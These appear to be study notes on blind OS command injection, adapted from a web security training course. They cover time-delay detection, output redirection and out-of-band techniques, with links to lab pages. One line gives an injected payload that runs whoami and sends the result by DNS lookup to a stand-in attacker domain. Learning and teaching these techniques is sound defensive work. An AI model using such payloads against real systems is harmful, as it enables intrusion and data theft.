Many instances of OS command injection are blind vulnerabilities. This means that the application does not return the output from the command within its HTTP response. Blind vulnerabilities can still be exploited, but different techniques are required.

Consider a web site that lets users submit feedback about the site. The user enters their email address and feedback message. The server-side application then generates an email to a site administrator containing the feedback. To do this, it calls out to the `mail` program with the submitted details. For example:

```
mail -s "This site is great" -aFrom:peter@normal-user.net feedback@vulnerable-website.com
```

The output from the `mail` command (if any) is not returned in the application's responses, and so using the `echo` payload would not be effective. In this situation, you can use a variety of other techniques to detect and exploit a vulnerability.

## Detecting blind OS command injection using time delays

You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond.
ExLab: [2\. lab-blind-time-delays](../../../../learn/portswigger/Web%20Security%20Academy/OS%20command%20injection/lab/practitioner/2.%20lab-blind-time-delays.md)

## Exploiting blind OS command injection by redirecting output

You can redirect the output from the injected command into a file within the web root that you can then retrieve using the browser.
ExLab: [3\. lab-blind-output-redirection](../../../../learn/portswigger/Web%20Security%20Academy/OS%20command%20injection/lab/practitioner/3.%20lab-blind-output-redirection.md)

## Exploiting blind OS command injection using out-of-band (OAST) techniques

You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques.
ExLab: [4\. lab-blind-out-of-band](../../../../learn/portswigger/Web%20Security%20Academy/OS%20command%20injection/lab/practitioner/4.%20lab-blind-out-of-band.md)

The out-of-band channel also provides an easy way to exfiltrate the output from injected commands:

```
& nslookup `whoami`.kgji2ohoyw.web-attacker.com &
```

ExLab: [5\. lab-blind-out-of-band-data-exfiltration](../../../../learn/portswigger/Web%20Security%20Academy/OS%20command%20injection/lab/practitioner/5.%20lab-blind-out-of-band-data-exfiltration.md)